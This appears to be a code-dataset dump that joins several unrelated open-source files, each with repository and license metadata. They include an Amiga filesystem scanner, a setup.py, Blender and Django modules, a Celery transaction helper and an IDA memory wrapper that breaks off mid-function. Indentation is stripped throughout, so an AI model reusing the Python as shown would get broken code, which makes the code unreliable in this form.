return "<DirInfo @%d '%s' #%d parent:%d child:#%d>" % (blk_num, name, len(self.chains), parent_blk, len(self.children))
class DirScan:
"""directory tree scanner"""
def __init__(self, block_scan, log):
self.log = log
self.block_scan = block_scan
self.root_di = None
self.intl = DosType.is_intl(block_scan.dos_type)
self.files = []
self.dirs = []
def scan_tree(self, root_blk_num, progress=None):
"""scan the root tree"""
# get root block info
root_bi = self.block_scan.get_block(root_blk_num)
if root_bi == None:
self.log.msg(Log.ERROR,"Root block not found?!",root_blk_num)
return None
# do tree scan
if progress != None:
progress.begin("dir")
self.root_di = self.scan_dir(root_bi, progress)
if progress != None:
progress.end()
return self.root_di
def scan_dir(self, dir_bi, progress):
"""check a directory by scanning through the hash table entries and follow the chains
Returns (all_chains_ok, dir_obj)
"""
# create new dir info
di = DirInfo(dir_bi)
self.dirs.append(di)
# run through hash_table of directory and build chains
chains = {}
hash_val = 0
for blk_num in dir_bi.hash_table:
if blk_num != 0:
# build chain
chain = DirChain(hash_val)
self.build_chain(chain, dir_bi, blk_num, progress)
di.add(chain)
hash_val += 1
return di
def build_chain(self, chain, dir_blk_info, blk_num, progress):
"""build a block chain"""
dir_blk_num = dir_blk_info.blk_num
dir_name = dir_blk_info.name
hash_val = chain.hash_val
# make sure entry block is first used
block_used = self.block_scan.is_block_available(blk_num)
# get entry block
blk_info = self.block_scan.read_block(blk_num)
# create dir chain entry
dce = DirChainEntry(blk_info)
chain.add(dce)
# account
if progress != None:
progress.add()
# block already used?
if block_used:
self.log.msg(Log.ERROR, "dir block already used in chain #%d of dir '%s (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# self reference?
if blk_num == dir_blk_num:
self.log.msg(Log.ERROR, "dir block in its own chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# not a block in range
if blk_info == None:
self.log.msg(Log.ERROR, "out-of-range block terminates chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# check type of entry block
b_type = blk_info.blk_type
if b_type not in (BlockScan.BT_DIR, BlockScan.BT_FILE_HDR):
self.log.msg(Log.ERROR, "invalid block terminates chain #%d of dir '%s' (%d)" % (hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# check referenceed block type in chain
blk_type = blk_info.blk_type
if blk_type in (BlockScan.BT_ROOT, BlockScan.BT_FILE_LIST, BlockScan.BT_FILE_DATA):
self.log.msg(Log.ERROR, "invalid block type %d terminates chain #%d of dir '%s' (%d)" % (blk_type, hash_val, dir_name, dir_blk_num), blk_num)
dce.end = True
return
# all following are ok
dce.valid = True
# check parent of block
name = blk_info.name
dce.parent_ok = (blk_info.parent_blk == dir_blk_num)
if not dce.parent_ok:
self.log.msg(Log.ERROR, "invalid parent in '%s' chain #%d of dir '%s' (%d)" % (name, hash_val, dir_name, dir_blk_num), blk_num)
# check name hash
fn = FileName(name, self.intl)
fn_hash = fn.hash()
dce.fn_hash_ok = (fn_hash == hash_val)
if not dce.fn_hash_ok:
self.log.msg(Log.ERROR, "invalid name hash in '%s' chain #%d of dir '%s' (%d)" % (name, hash_val, dir_name, dir_blk_num), blk_num)
# recurse into dir?
if blk_type == BlockScan.BT_DIR:
dce.sub = self.scan_dir(blk_info, progress)
elif blk_type == BlockScan.BT_FILE_HDR:
self.files.append(dce)
# check next block in chain
next_blk = blk_info.next_blk
if next_blk != 0:
self.build_chain(chain, dir_blk_info, next_blk, progress)
else:
dce.end = True
def get_all_file_hdr_blk_infos(self):
"""return all file chain entries"""
result = []
for f in self.files:
result.append(f.blk_info)
return result
def get_all_dir_infos(self):
"""return all dir infos"""
return self.dirs
def dump(self):
"""dump whole dir info structure"""
self.dump_dir_info(self.root_di, 0)
def dump_dir_info(self, di, indent):
"""dump a single dir info structure and its sub dirs"""
istr = " " * indent
print istr, di
for hash_value in sorted(di.get_chains().keys()):
dc = di.get(hash_value)
print istr," ",dc
for dce in dc.get_entries():
print istr," ",dce
sub = dce.sub
if sub != None and dce.blk_info.blk_type == BlockScan.BT_DIR:
self.dump_dir_info(sub, indent+1)
|
bsd-2-clause
| -732,434,269,223,529,100
| 28.333333
| 147
| 0.60169
| false
| 3.150069
| false
| false
| false
|
oaubert/advene
|
setup.py
|
1
|
6968
|
#! /usr/bin/env python3
import logging
logger = logging.getLogger(__name__)
import os
from setuptools import setup, find_packages
import sys
# We define the main script name here (file in bin), since we have to change it for MacOS X
SCRIPTNAME='advene'
def check_changelog(maindir, version):
"""Check that the changelog for maindir matches the given version."""
with open(os.path.join( maindir, "CHANGES.txt" ), 'r') as f:
l=f.readline()
if not l.startswith('advene (' + version + ')'):
logger.error("The CHANGES.txt does not seem to match version %s\n%s\nUpdate either the CHANGES.txt or the lib/advene/core/version.py file", version, l)
sys.exit(1)
return True
def get_plugin_list(*package):
"""Return a plugin list from the given package.
package is in fact a list of path/module path elements.
No recursion is done.
"""
package= [ 'advene' ] + list(package)
path=os.path.sep.join(package)
prefix='.'.join(package)
plugins=[]
d=os.path.join('lib', path)
if not os.path.exists(d):
raise Exception("%s does not match a directory (%s does not exist)" % (prefix, d))
for n in os.listdir(d):
name, ext = os.path.splitext(n)
if ext != '.py':
continue
# Poor man's grep.
if [ l for l in open(os.path.join(d, n)).readlines() if 'def register' in l ]:
# It may be a plugin. Include it.
plugins.append('.'.join((prefix, name)))
return plugins
def get_version():
"""Get the version number of the package."""
maindir = os.path.dirname(os.path.abspath(sys.argv[0]))
if os.path.exists(os.path.join(maindir, "setup.py")):
# Chances are that we were in a development tree...
libpath=os.path.join(maindir, "lib")
sys.path.insert (0, libpath)
import advene.core.version
version=advene.core.version.version
else:
raise Exception("Unable to determine advene version number.")
check_changelog(maindir, version)
return version
_version=get_version()
platform_options={}
def get_packages_list():
"""Recursively find packages in lib.
Return a list of packages (dot notation) suitable as packages parameter
for distutils.
"""
if 'linux' in sys.platform:
return find_packages('lib', exclude=["cherrypy.*"])
else:
return find_packages('lib')
def generate_data_dir(dir_, prefix="", postfix=""):
"""Return a structure suitable for datafiles from a directory.
It will return a sequence of (directory, files) corresponding to the
data in the given directory.
prefix and postfix are dumbly added to dirname, so do not forget
the trailing / for prefix, and leading / for postfix if necessary.
"""
l = []
installdir=prefix+dir_+postfix
for dirname, dnames, fnames in os.walk(dir_):
if fnames:
if dirname.startswith(dir_):
installdirname=dirname.replace(dir_, installdir, 1)
l.append((installdirname, [ absf
for absf in [ os.path.sep.join((dirname,f))
for f in fnames ]
if not os.path.isdir(absf) ]))
return l
def generate_data_files():
# On Win32, we will install data files in
# \Program Files\Advene\share\...
# On MacOS X, it will be in Advene.app/Contents/Resources
# On Unix, it will be
# /usr/share/advene/...
if sys.platform == 'win32' or sys.platform == 'darwin':
prefix=''
postfix=''
else:
prefix="share"+os.path.sep
postfix=os.path.sep+"advene"
r=generate_data_dir("share", postfix=postfix)
r.extend(generate_data_dir("doc", prefix=prefix, postfix=postfix))
if not os.path.isdir("locale"):
logger.warning("""**WARNING** Generating the locales with "cd po; make mo".""")
os.system("pwd; cd po; make mo")
if os.path.isdir("locale"):
r.extend(generate_data_dir("locale", prefix=prefix))
else:
logger.warning("""**WARNING** Cannot find locale directory.""")
if sys.platform.startswith('linux'):
# Install specific data files
r.append( ( 'share/applications', [ 'share/advene.desktop' ] ) )
return r
myname = "Olivier Aubert"
myemail = "contact@olivieraubert.net"
setup (name = "advene",
version = _version,
description = "Annotate DVds, Exchange on the NEt",
keywords = "dvd,video,annotation",
author = "Advene project team",
author_email = myemail,
maintainer = myname,
maintainer_email = myemail,
url = "https://www.advene.org/",
license = "GPL",
long_description = """Annotate DVds, Exchange on the NEt
The Advene (Annotate DVd, Exchange on the NEt) project is aimed
towards communities exchanging discourses (analysis, studies) about
audiovisual documents (e.g. movies) in DVD format. This requires that
audiovisual content and hypertext facilities be integrated, thanks to
annotations providing explicit structures on audiovisual streams, upon
which hypervideo documents can be engineered.
.
The cross-platform Advene application allows users to easily
create comments and analyses of video comments, through the
definition of time-aligned annotations and their mobilisation
into automatically-generated or user-written comment views (HTML
documents). Annotations can also be used to modify the rendition
of the audiovisual document, thus providing virtual montage,
captioning, navigation... capabilities. Users can exchange their
comments/analyses in the form of Advene packages, independently from
the video itself.
.
The Advene framework provides models and tools allowing to design and reuse
annotations schemas; annotate video streams according to these schemas;
generate and create Stream-Time Based (mainly video-centred) or User-Time
Based (mainly text-centred) visualisations of the annotations. Schemas
(annotation- and relation-types), annotations and relations, queries and
views can be clustered and shared in units called packages. Hypervideo
documents are generated when needed, both from packages (for annotation and
view description) and DVDs (audiovisual streams).
""",
package_dir = {'': 'lib'},
packages = get_packages_list(),
scripts = [ 'bin/%s' % SCRIPTNAME, 'bin/advene_import', 'bin/advene_export' ],
data_files = generate_data_files(),
classifiers = [
'Environment :: X11 Applications :: GTK',
'Environment :: Win32 (MS Windows)',
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Intended Audience :: End Users/Desktop',
'Operating System :: OS Independent',
'Topic :: Multimedia :: Video :: Non-Linear Editor'
],
**platform_options
)
|
gpl-2.0
| 829,313,294,184,711,600
| 37.076503
| 159
| 0.65729
| false
| 3.862528
| false
| false
| false
|
willcassella/SinGE
|
Tools/SinGED/types.py
|
1
|
12310
|
# types.py
import bpy
from bpy.types import PropertyGroup
from bpy.props import BoolProperty, IntProperty, FloatProperty, StringProperty, PointerProperty, EnumProperty, FloatVectorProperty
from functools import partial
def get_unused_component_types(scene=None, context=None):
# Unused arguments
del scene, context
node_id = bpy.context.active_object.sge_node_id
sge_scene = SinGEDProps.sge_scene
node = sge_scene.get_node(node_id)
used_component = sge_scene.get_node_components(node)
result = []
for component_type in SinGEDProps.sge_typedb.component_types:
if component_type not in (c.type.type_name for c in used_component):
result.append((component_type, component_type, ''))
return result
def construct_property_display_name(prop_name):
return prop_name.replace("_", " ")
def construct_property_path(property_path_str, prop_name):
if len(property_path_str) == 0:
return [prop_name]
return property_path_str.split('.') + [prop_name]
def property_getter(component_type_name, property_path, default):
try:
# Get the active node and component instance
sge_scene = SinGEDProps.sge_scene
node_id = bpy.context.active_object.sge_node_id
node = sge_scene.get_node(node_id)
component_type = sge_scene.get_component_type(component_type_name)
component_instance = component_type.get_instance(node)
# Get the property value
return component_instance.get_sub_property_immediate(property_path, default)
except Exception:
path = [component_type_name]
path.extend(property_path)
print("ERROR RETREIVING PROPERTY: {}".format(path))
return default
def property_setter(component_type_name, property_path, value):
# Get the active node and component instance
sge_scene = SinGEDProps.sge_scene
node_id = bpy.context.active_object.sge_node_id
node = sge_scene.get_node(node_id)
component_type = sge_scene.get_component_type(component_type_name)
component_instance = component_type.get_instance(node)
# Set the property value
component_instance.set_sub_property_immediate(property_path, value)
class SGETypes(PropertyGroup):
sge_component_types = EnumProperty(items=get_unused_component_types)
class SinGEDProps(PropertyGroup):
sge_host = StringProperty(name='Host', default='localhost')
sge_port = IntProperty(name='Port', default=1995)
sge_types = PointerProperty(type=SGETypes)
sge_realtime_update_delay = FloatProperty(default=0.033, precision=3, unit='TIME')
sge_scene_path = StringProperty(name='Path', default='')
sge_lightmap_light_dir = FloatVectorProperty(name="Light direction", subtype='XYZ', size=3, default=[0.0, -0.5, -0.5])
sge_lightmap_light_color = FloatVectorProperty(name="Light color", subtype='COLOR', size=3, default=[0.5, 0.5, 0.5])
sge_lightmap_light_intensity = FloatProperty(name="Light intensity", default=8.0)
sge_lightmap_ambient_color = FloatVectorProperty(name="Ambient light color", subtype='COLOR', size=3, default=[0.5, 0.5, 0.5])
sge_lightmap_ambient_intensity = FloatProperty(name="Ambient light intensity", default=0.0)
sge_lightmap_num_indirect_sample_sets = IntProperty(name="Indirect sample sets", subtype='UNSIGNED', default=16)
sge_lightmap_num_accumulation_steps = IntProperty(name="Accumulation steps", subtype='UNSIGNED', default=1)
sge_lightmap_num_post_steps = IntProperty(name="Post processing steps", subtype='UNSIGNED', default=2)
sge_lightmap_path = StringProperty(name="Lightmap path")
sge_session = None
sge_typedb = None
sge_scene = None
sge_resource_manager = None
class SGETypeBase(PropertyGroup):
@classmethod
def sge_unregister(cls):
bpy.utils.unregister_class(cls)
@classmethod
def sge_create_property(cls, name):
return PointerProperty(name=name, type=cls)
@classmethod
def sge_draw(cls, layout, parent_obj, parent_attr_name):
# Draw each property recursively
self = getattr(parent_obj, parent_attr_name)
for attr_name, prop_name, prop_type in cls.sge_property_list:
# If the property is a primitive type, don't give it a label
if not issubclass(prop_type, SGEPrimitiveBase):
layout.label(construct_property_display_name(prop_name))
prop_type.sge_draw(layout.column(), self, attr_name)
class SGEPrimitiveBase(object):
@staticmethod
def sge_unregister():
return
@staticmethod
def sge_draw(layout, parent_obj, parent_attr_name):
# Draw the property
layout.prop(parent_obj, parent_attr_name)
class SGEBool(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return BoolProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), False),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEInt(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return IntProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEUInt(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return IntProperty(
name=construct_property_display_name(name),
subtype='UNSIGNED',
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEFloat(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0.0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEString(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return StringProperty(
name=construct_property_display_name(name),
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), ""),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEAngle(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatProperty(
name=construct_property_display_name(name),
subtype='ANGLE',
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), 0),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEColorRGBA8(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), "ffffffff")
red = int(value[: 2], 16)
green = int(value[2: 4], 16)
blue = int(value[4: 6], 16)
alpha = int(value[6: 8], 16)
return [float(red)/255, float(green)/255, float(blue)/255, float(alpha)/255]
@staticmethod
def sge_set(outer, prop_name, value):
red = int(value[0] * 255)
green = int(value[1] * 255)
blue = int(value[2] * 255)
alpha = int(value[3] * 255)
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), "%0.2x%0.2x%0.2x%0.2x" % (red, green, blue, alpha))
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=name,
subtype='COLOR',
size=4,
min=0.0,
max=1.0,
get=lambda outer: SGEColorRGBA8.sge_get(outer, name),
set=lambda outer, value: SGEColorRGBA8.sge_set(outer, name, value))
class SGEColorRGBF32(SGEPrimitiveBase):
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='COLOR',
size=3,
get=lambda outer: property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), [0.0, 0.0, 0.0]),
set=lambda outer, value: property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, name), value))
class SGEVec2(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), None)
if value is None:
return [0.0, 0.0]
else:
return [value['x'], value['y']]
@staticmethod
def sge_set(outer, prop_name, value):
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), {'x': value[0], 'y': value[1]})
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='XYZ',
size=2,
get=lambda outer: SGEVec2.sge_get(outer, name),
set=lambda outer, value: SGEVec2.sge_set(outer, name, value))
class SGEVec3(SGEPrimitiveBase):
@staticmethod
def sge_get(outer, prop_name):
value = property_getter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), None)
if value is None:
return [0.0, 0.0, 0.0]
else:
return [value['x'], value['y'], value['z']]
@staticmethod
def sge_set(outer, prop_name, value):
property_setter(outer.sge_component_type_name, construct_property_path(outer.sge_property_path, prop_name), {'x': value[0], 'y': value[1], 'z': value[2]})
@staticmethod
def sge_create_property(name):
return FloatVectorProperty(
name=construct_property_display_name(name),
subtype='XYZ',
size=3,
get=lambda outer: SGEVec3.sge_get(outer, name),
set=lambda outer, value: SGEVec3.sge_set(outer, name, value))
def create_blender_type(typedb, type_name, type_info):
# Create dictionaries for the class and the properties
property_list = list()
class_dict = {
'sge_type_name': type_name,
'sge_property_list': property_list,
'sge_component_type_name': StringProperty(),
'sge_property_path': StringProperty(),
}
# Define each property
if 'properties' in type_info:
properties = list(type_info['properties'].items())
properties.sort(key=lambda prop: prop[1]['index'])
for prop_name, prop_info in properties:
# Get the property's type
prop_type = typedb.get_type(prop_info['type'])
# Create an attribute name for the property
attr_name = "sge_prop_{}".format(prop_name)
# Create the class dictionary entry
class_dict[attr_name] = prop_type.sge_create_property(prop_name)
# Create the property list entry
property_list.append((attr_name, prop_name, prop_type))
# Generate a sanitary name for the type
class_name = type_name.replace("::", "_")
# Create the type
blender_type = type(class_name, (SGETypeBase,), class_dict)
# Register it with Blender
bpy.utils.register_class(blender_type)
return blender_type
|
mit
| -3,868,031,757,075,581,000
| 39.89701
| 167
| 0.670106
| false
| 3.507123
| false
| false
| false
|
Seattle-Meal-Maps/seattle-meal-maps-api
|
meal_api/meal_api/urls.py
|
1
|
1205
|
"""meal_api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from api.views import DataViewSet, HoursViewSet
router = routers.DefaultRouter()
router.register(r'services', DataViewSet)
router.register(r'hours', HoursViewSet)
hours_list = HoursViewSet.as_view({
'get': 'list'
})
data_list = DataViewSet.as_view({
'get': 'list'
})
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
|
mit
| -6,016,341,527,609,289,000
| 32.472222
| 82
| 0.703734
| false
| 3.37535
| false
| false
| false
|
ZeitOnline/z3c.celery
|
src/z3c/celery/session.py
|
1
|
1860
|
import threading
import transaction
import zope.interface
import transaction.interfaces
class CelerySession(threading.local):
"""Thread local session of data to be sent to Celery."""
def __init__(self):
self.tasks = []
self._needs_to_join = True
def add_call(self, method, *args, **kw):
self._join_transaction()
self.tasks.append((method, args, kw))
def reset(self):
self.tasks = []
self._needs_to_join = True
def _join_transaction(self):
if not self._needs_to_join:
return
dm = CeleryDataManager(self)
transaction.get().join(dm)
self._needs_to_join = False
def _flush(self):
for method, args, kw in self.tasks:
method(*args, **kw)
self.reset()
def __len__(self):
"""Number of tasks in the session."""
return len(self.tasks)
celery_session = CelerySession()
@zope.interface.implementer(transaction.interfaces.IDataManager)
class CeleryDataManager(object):
"""DataManager embedding the access to celery into the transaction."""
transaction_manager = None
def __init__(self, session):
self.session = session
def abort(self, transaction):
self.session.reset()
def tpc_begin(self, transaction):
pass
def commit(self, transaction):
pass
tpc_abort = abort
def tpc_vote(self, transaction):
self.session._flush()
def tpc_finish(self, transaction):
pass
def sortKey(self):
# Sort last, so that sending to celery is done after all other
# DataManagers signalled an okay.
return "~z3c.celery"
def __repr__(self):
"""Custom repr."""
return '<{0.__module__}.{0.__name__} for {1}, {2}>'.format(
self.__class__, transaction.get(), self.session)
|
bsd-3-clause
| -8,065,323,295,136,975,000
| 23.473684
| 74
| 0.601075
| false
| 3.982869
| false
| false
| false
|
bnoi/scikit-tracker
|
sktracker/tracker/cost_function/tests/test_abstract_cost_functions.py
|
1
|
1500
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from nose.tools import assert_raises
import sys
import pandas as pd
import numpy as np
from sktracker.tracker.cost_function import AbstractCostFunction
def test_abstract_cost_function():
cost_func = AbstractCostFunction(context={}, parameters={})
assert cost_func.get_block() == None
def test_abstract_cost_function_check_context():
cost_func = AbstractCostFunction(context={'cost': 1}, parameters={})
assert_raises(ValueError, cost_func.check_context, 'test_string', str)
cost_func.context['test_string'] = 5
assert_raises(TypeError, cost_func.check_context, 'test_string', str)
cost_func.context['test_string'] = "i am a string"
### This fails in py2.7
if sys.version_info[0] > 2:
cost_func.check_context('test_string', str)
assert True
def test_abstract_cost_function_check_columns():
cost_func = AbstractCostFunction(context={}, parameters={})
df = pd.DataFrame([np.arange(0, 5), np.arange(20, 25)],
columns=['x', 'y', 'z', 'w', 't'])
cost_func.check_columns(df, ['t', 'z', 'y'])
cost_func.check_columns([df], ['t', 'z', 'y'])
df = pd.DataFrame([np.arange(0, 4), np.arange(20, 24)],
columns=['x', 'y', 'w', 't'])
assert_raises(ValueError, cost_func.check_columns, df, ['t', 'z', 'y'])
|
bsd-3-clause
| 8,376,291,811,204,249,000
| 26.777778
| 75
| 0.64
| false
| 3.440367
| true
| false
| false
|
chubbymaggie/idalink
|
idalink/memory.py
|
1
|
10682
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2013- Yan Shoshitaishvili aka. zardus
# Ruoyu Wang aka. fish
# Andrew Dutcher aka. rhelmot
# Kevin Borgolte aka. cao
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ["get_memory", "IDAMemory", "CachedIDAMemory",
"IDAPermissions", "CachedIDAPermissions"]
import collections
import itertools
import logging
import operator
LOG = logging.getLogger("idalink.ida_mem")
# Helper functions.
def _dict_values_sorted_by_key(dictionary):
# This should be a yield from instead.
"""Internal helper to return the values of a dictionary, sorted by key.
"""
for _, value in sorted(dictionary.iteritems(), key=operator.itemgetter(0)):
yield value
def _ondemand(f):
"""Decorator to only request information if not in cache already.
"""
name = f.__name__
def func(self, *args, **kwargs):
if not args and not kwargs:
if hasattr(self, "_" + name):
return getattr(self, "_" + name)
a = f(self, *args, **kwargs)
setattr(self, "_" + name, a)
return a
else:
return f(self, *args, **kwargs)
func.__name__ = name
return func
# Functions others are allowed to call.
def get_memory(idaapi, start, size, default_byte=None):
# TODO: Documentation
if idaapi is None:
idaapi = __import__("idaapi")
if size == 0:
return {}
# We are optimistic and assume it's a continous memory area
at_address = idaapi.get_many_bytes(start, size)
d = {}
if at_address is None: # It was not, resort to binary research
if size == 1:
if default_byte is not None:
LOG.debug("Using default byte for %d", start)
d[start] = default_byte
return d
mid = start + size / 2
first_size = mid - start
second_size = size - first_size
left = get_memory(idaapi, start, first_size, default_byte=default_byte)
right = get_memory(idaapi, mid, second_size, default_byte=default_byte)
if default_byte is None:
# will be nonsequential
d.update(left)
d.update(right)
else:
# it will be sequential, so let's combine it
chained = itertools.chain(_dict_values_sorted_by_key(left),
_dict_values_sorted_by_key(right))
d[start] = "".join(chained)
else:
d[start] = at_address
return d
class IDAKeys(collections.MutableMapping): # pylint: disable=W0223
# TODO: delitem, setitem, getitem are abstract, should be fixed,
# disabled warning should be removed
def __init__(self, ida):
self.ida = ida
# Gets the "heads" (instructions and data items) and head sizes from IDA
@_ondemand
def heads(self, exclude=()):
# TODO: Documentation
LOG.debug("Getting heads from IDA for file %s", self.ida.filename)
keys = [-1] + list(exclude) + [self.ida.idc.MAXADDR + 1]
ranges = []
for i in range(len(keys) - 1):
a, b = keys[i], keys[i+1]
if a - b > 1:
ranges.append((a+1, b-1))
heads = {}
for start, end in ranges:
for head in self.ida.idautils.Heads(start, end, 1):
heads[head] = self.ida.idc.ItemSize(head)
return heads
@_ondemand
def segments(self):
# TODO: Documentation
LOG.debug("Getting segments from IDA for file %s", self.ida.filename)
segments_size = {}
for s in self.ida.idautils.Segments():
segments_size[s] = self.ida.idc.SegEnd(s) - self.ida.idc.SegStart(s)
return segments_size
@_ondemand
def idakeys(self):
# TODO: Documentation
keys = set()
for h, s in self.segments().iteritems():
for i in range(s):
keys.add(h + i)
for h, s in self.heads(exclude=keys).iteritems():
for i in range(s):
keys.add(h + i)
LOG.debug("Done getting keys.")
return keys
def __iter__(self):
# TODO: Refactor to be more pythonic
for key in self.idakeys():
yield key
def __len__(self):
# This is significantly faster than list(self.__iter__) because
# we do not need to keep the whole list in memory, just the accumulator.
return sum(1 for _ in self)
def __contains__(self, key):
return key in self.keys()
def reset(self):
# TODO: Documentation
if hasattr(self, "_heads"):
delattr(self, "_heads")
if hasattr(self, "_segments"):
delattr(self, "_segments")
if hasattr(self, "_idakeys"):
delattr(self, "_idakeys")
class IDAPermissions(IDAKeys):
def __init__(self, ida, default_perm=7):
super(IDAPermissions, self).__init__(ida)
self.default_perm = default_perm
def __getitem__(self, address):
# Only do things that we actually have in IDA
if address not in self:
raise KeyError(address)
seg_start = self.ida.idc.SegStart(address)
if seg_start == self.ida.idc.BADADDR:
# We can really only return the default here
return self.default_perm
return self.ida.idc.GetSegmentAttr(seg_start, self.ida.idc.SEGATTR_PERM)
def __setitem__(self, address, value):
# Nothing we can do here
pass
def __delitem__(self, address, value):
# Nothing we can do here
pass
class CachedIDAPermissions(IDAPermissions):
def __init__(self, ida, default_perm=7):
super(CachedIDAPermissions, self).__init__(ida)
self.permissions = {}
self.default_perm = default_perm
def __getitem__(self, address):
if address in self.permissions:
return self.permissions[address]
p = super(CachedIDAPermissions, self).__getitem__(address)
# cache the segment
seg_start = self.ida.idc.SegStart(address)
seg_end = self.ida.idc.SegEnd(address)
if seg_start == self.ida.idc.BADADDR:
self.permissions[address] = p
else:
for i in range(seg_start, seg_end):
self.permissions[i] = p
return p
def __setitem__(self, address, value):
self.permissions[address] = value
def __delitem__(self, address):
self.permissions.pop(address, None)
def reset(self):
# TODO: Documentation
self.permissions.clear()
super(CachedIDAPermissions, self).reset()
class IDAMemory(IDAKeys):
def __init__(self, ida, default_byte=chr(0xff)):
super(IDAMemory, self).__init__(ida)
self.default_byte = default_byte
def __getitem__(self, address):
# only do things that we actually have in IDA
if address not in self:
raise KeyError(address)
value = self.ida.idaapi.get_many_bytes(address, 1)
if value is None:
value = self.default_byte
return value
def __setitem__(self, address, value):
self.ida.idaapi.patch_byte(address, value)
def __delitem__(self, address):
# nothing we can really do here
pass
class CachedIDAMemory(IDAMemory):
def __init__(self, ida, default_byte=chr(0xff)):
super(CachedIDAMemory, self).__init__(ida, default_byte)
self.local = {}
self._pulled = False
@property
def pulled(self):
"""Check if memory has been pulled from the remote link.
"""
return self._pulled
def __getitem__(self, address):
if address in self.local:
return self.local[address]
LOG.debug("Uncached byte: 0x%x", address)
one = super(CachedIDAMemory, self).__getitem__(address)
# cache the byte if it's not in a segment
seg_start = self.ida.idc.SegStart(address)
if seg_start == self.ida.idc.BADADDR:
self.local[address] = one
else:
# otherwise, cache the segment
seg_end = self.ida.idc.SegEnd(address)
seg_size = seg_end - seg_start
self._load_memory(seg_start, seg_size)
return one
def __iter__(self):
if self.pulled:
return self.local.__iter__()
else:
return super(CachedIDAMemory, self).__iter__()
def __setitem__(self, address, value):
self.local[address] = value
def __delitem__(self, address):
self.local.pop(address, None)
def get_memory(self, start, size):
"""Retrieve an area of memory from IDA.
Returns a sparse dictionary of address -> value.
"""
LOG.debug("get_memory: %d bytes from %x", size, start)
return get_memory(self.ida.idaapi, start, size,
default_byte=self.default_byte)
def pull_defined(self):
if self.pulled:
return
start = self.ida.idc.MinEA()
size = self.ida.idc.MaxEA() - start
LOG.debug("Loading memory of %s (%d bytes)...", self.ida.filename, size)
chunks = self.ida.remote_idalink_module.get_memory(None, start, size)
LOG.debug("Storing loaded memory of %s...", self.ida.filename)
self._store_loaded_chunks(chunks)
self._pulled = True
def reset(self):
self.local.clear()
self._pulled = False
super(CachedIDAMemory, self).reset()
# Helpers
def _load_memory(self, start, size):
chunks = self.get_memory(start, size)
self.store_loaded_chunks(chunks)
def _store_loaded_chunks(self, chunks):
LOG.debug("Updating cache with %d chunks", len(chunks))
for start, buff in chunks.iteritems():
for n, i in enumerate(buff):
